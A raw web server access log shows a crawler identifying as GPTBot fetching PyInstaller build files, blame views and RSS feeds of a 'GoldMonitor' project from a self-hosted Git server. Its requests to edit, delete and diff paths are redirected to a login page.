"https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" -[17/Feb/2026:18:27:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" -[17/Feb/2026:18:27:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" -[17/Feb/2026:18:27:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" -[17/Feb/2026:18:27:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" -[17/Feb/2026:18:27:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" -[17/Feb/2026:18:27:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" -[17/Feb/2026:18:27:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" -[17/Feb/2026:18:27:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" -[17/Feb/2026:18:27:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" -[17/Feb/2026:18:27:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" -[17/Feb/2026:18:27:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" [Client 74.7.227.38] [Length 900] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" -[17/Feb/2026:18:27:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" [Client 74.7.227.38] [Length 900] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" -[17/Feb/2026:18:27:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" [Client 74.7.227.38] [Length 159003] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" -[17/Feb/2026:18:27:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" [Client 74.7.227.38] [Length 159003] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" -[17/Feb/2026:18:27:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" [Client 74.7.227.38] [Length 73286] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" -[17/Feb/2026:18:27:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" [Client 74.7.227.38] [Length 73286] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" -[17/Feb/2026:18:27:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" [Client 74.7.227.38] [Length 160535] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" -[17/Feb/2026:18:27:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" [Client 74.7.227.38] [Length 900] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" -[17/Feb/2026:18:27:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" [Client 74.7.227.38] [Length 160654] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" -[17/Feb/2026:18:27:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" [Client 74.7.227.38] [Length 900] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" -[17/Feb/2026:18:27:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" [Client 74.7.227.38] [Length 158884] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" -[17/Feb/2026:18:27:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" [Client 74.7.227.38] [Length 900] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" -[17/Feb/2026:18:27:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" [Client 74.7.227.38] [Length 160654] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" -[17/Feb/2026:18:27:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" [Client 74.7.227.38] [Length 47964] [Gzip 26.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" -[17/Feb/2026:18:27:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" [Client 74.7.227.38] [Length 50052] [Gzip 27.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" -[17/Feb/2026:18:27:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" [Client 74.7.227.38] [Length 50052] [Gzip 27.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" -[17/Feb/2026:18:27:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" [Client 74.7.227.38] [Length 900] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" -[17/Feb/2026:18:27:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" [Client 74.7.227.38] [Length 900] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" -[17/Feb/2026:18:27:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" [Client 74.7.227.38] [Length 900] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" -[17/Feb/2026:18:27:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" [Client 74.7.227.38] [Length 4184405] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" -[17/Feb/2026:18:27:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" [Client 74.7.227.38] [Length 4276110] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" -[17/Feb/2026:18:27:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" [Client 74.7.227.38] [Length 110588] [Gzip 18.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full" -[17/Feb/2026:18:27:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" [Client 74.7.227.38] [Length 44317] [Gzip 15.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full" -[17/Feb/2026:18:27:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/EXE-00.toc" [Client 74.7.227.38] [Length 71106] [Gzip 17.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full" -[17/Feb/2026:18:27:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" -[17/Feb/2026:18:27:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" -[17/Feb/2026:18:27:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" -[17/Feb/2026:18:27:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" -[17/Feb/2026:18:27:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" -[17/Feb/2026:18:27:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" -[17/Feb/2026:18:27:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" -[17/Feb/2026:18:27:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" -[17/Feb/2026:18:27:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" -[17/Feb/2026:18:27:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" -[17/Feb/2026:18:27:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" -[17/Feb/2026:18:27:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" -[17/Feb/2026:18:27:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/PKG-00.toc" [Client 74.7.227.38] [Length 69542] [Gzip 17.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full" -[17/Feb/2026:18:27:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13366] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:18:27:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" [Client 74.7.227.38] [Length 912] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" -[17/Feb/2026:18:27:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" -[17/Feb/2026:18:27:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" -[17/Feb/2026:18:27:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" -[17/Feb/2026:18:27:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" -[17/Feb/2026:18:27:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" -[17/Feb/2026:18:27:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" -[17/Feb/2026:18:27:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/gold_monitor_full/EXE-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/EXE-00.toc" -[17/Feb/2026:18:27:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/gold_monitor_full/EXE-00.toc" -[17/Feb/2026:18:27:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/gold_monitor_full/EXE-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/EXE-00.toc" -[17/Feb/2026:18:27:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 